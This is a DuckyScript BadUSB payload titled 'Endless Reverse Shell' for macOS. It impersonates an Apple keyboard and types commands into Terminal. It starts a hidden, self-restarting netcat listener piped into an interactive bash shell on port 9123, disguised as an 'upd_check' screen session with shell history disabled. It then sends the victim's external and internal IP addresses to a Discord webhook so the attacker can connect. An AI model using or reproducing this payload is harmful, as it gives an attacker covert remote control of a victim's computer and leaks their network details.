REM Title: Endless Reverse Shell.txt
REM Author: YonKu0
REM Target: MacOS 
REM Version: 1.0
REM Category: Recon


ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 1000
STRING unset HISTFILE; screen -dmS upd_check bash -c 'unset HISTFILE; set +o history; trap "pkill -P \$\$" SIGINT SIGTERM; while true; do rm -f /tmp/f; mkfifo /tmp/f; nc -l 9123 < /tmp/f | bash -i > /tmp/f 2>&1 & nc_pid=$!; (sleep 300 && kill -9 $nc_pid 2>/dev/null) & wait $nc_pid; done'
DELAY 2000
ENTER
STRING curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"From Endless Reverse Shell BadUSB:\\nExternal IP: $(curl -s 'https://api.ipify.org')\\nInternal IP(s): $(ifconfig | grep -Eo 'inet (addr:)?([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -v '127.0.0.1' | sed 's/inet addr://' | sed 's/inet //' | paste -sd ',' - | sed 's/,/, /g')\\n----------------------------------------\"}" "YOUR_DISCORD_CHANNEL_TOKEN"
DELAY 2000
ENTER
DELAY 1500
GUI q
